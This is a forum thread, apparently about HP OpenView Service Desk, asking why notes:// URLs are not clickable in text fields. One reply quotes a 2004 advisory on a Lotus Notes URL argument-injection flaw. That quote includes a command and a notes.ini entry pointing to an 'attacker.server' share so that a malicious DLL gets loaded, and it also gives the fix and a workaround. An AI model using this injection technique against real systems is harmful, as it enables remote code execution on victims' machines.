Service Desk Practitioners Forum
cancel
Showing results for 
Search instead for 
Did you mean: 

URLs in fields

Highlighted
Robert S. Falko
Honored Contributor

URLs in fields

Dear All,

As we know, OVSD knows how to parse text fields for URLs and then run them with a mouse click.

As far as I can tell, OVSD knows about the protocols http, https and ftp. My question is whether this knowledge is built into OVSD, or whether it depends on the registry of the client. For example, if I type :

notes://blah.blah.toubib.com/asdfalskdfajésa9se

OVSD does NOT recognize this as an URL.

Anyone know the answer, and what we need to change in order to recognize other protocols in URLs ?

Thanks,
Josh
7 REPLIES
JaS_4
Honored Contributor

Re: URLs in fields

Hi Josh,

SD relies on a lot of api calls to access the OS for things like file associations and others. The urls are included.
See http://jouko.iki.fi/adv/notes.html which mentioned registry changes for notes:// url to be useable.
Robert S. Falko
Honored Contributor

Re: URLs in fields

Sounds like just what I am looking for.

However, I am unable to connect to that site! Do you know of another way to get the information?

Thanks,
Josh
JaS_4
Honored Contributor

Re: URLs in fields

Hi Josh,

This web site was on vurneability of the notes url. Here some relevant excerpt from it. I am assuming the registry changes will be in HKEY_CLASSES_ROOT\Notes\Shell\Open\Command or use regmon during Lotus lcient install.

During the client-side Windows installation of Lotus Notes, a "notes:" URL handler is registered in the registry. An argument injection attack allows an intruder to pass command line arguments to notes.exe, which can lead to execution of arbitrary code.

Details
The installed registry entry causes any "notes:" URL to be opened with notes.exe and the URL passed as the argument. If the URL contains space characters, notes.exe takes the characters after that as a second command line argument. Any web page can cause notes.exe be started in this way by refering to a notes: URL.

Location of Notes configuration file, notes.ini, can be specified on the command line by prefixing it with an equals sign (=). The notes.ini file can be located on a network share. An attacker can use the URL to specify an arbitrary notes.ini file located on a public network share, so that the command run when opening the URL would be e.g.

notes.exe =\\attacker.server\notes\notes.ini

The notes.ini file contains locations for Notes data directory, which in this case can be also located on a public network share. The notes.ini file could contain e.g.

[Notes]
Directory=\\attacker.server\\notes

The program uses this directory to load some dynamic libraries. The attacker can place arbitrary code in the init section of such DLL and cause it to be run during notes.exe startup. The scenario was successfully tested with an exploit. On opening the malicious web page, the victim system downloaded the DLL and ran the code in it.

The exploit requires that notes.exe isn't already running while the victim views the malicious web page or e-mail message, because DLL's are only loaded on program startup. It also requires that outgoing connections to Internet shares aren't blocked by firewalls or registry settings.

Solution
IBM was contacted on March 17, 2004. The fix SPR# KSPR5X6VEA has now been released to solve the issue. As a workaround, the registry key

HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

can be removed.

Robert S. Falko
Honored Contributor

Re: URLs in fields

OK. We have a value defined in the registry for notes -> shell -> open -> command.

Whether or not this is a security risk, my question is how to get OVSD to recognize "notes://..." as the prefix for a URL that you can open with a mouse click.

-Josh
JaS_4
Honored Contributor

Re: URLs in fields

Hi Josh,

If you can use the url in IE or via the windows explorer, that means the registry in the client is enable for Lotus Notes and if it still doesn't work in SD, it will mean that SD does not have this functionality which mean you will have to request SD to provide this functionality.
JaS_4
Honored Contributor

Re: URLs in fields

Hi Joshiah,
My apology to you. I am finally in a customer environment where SD has access to Lotus Notes and I found that SD does not recognise the url format of notes:///blahblahblah despite the fact that this url works on run prompt, IE browser and the notes address line and recognised by the OS. So it looks like SD code needs to be change before it will recognise the notes url format.
JaS_4
Honored Contributor

Re: URLs in fields

Hi Josiah,
My apology to you. I am finally in a customer environment where SD has access to Lotus Notes and I found that SD does not recognise the url format of notes:///blahblahblah despite the fact that this url works on run prompt, IE browser and the notes address line and recognised by the OS. So it looks like SD code needs to be change before it will recognise the notes url format.
//Add this to "OnDomLoad" event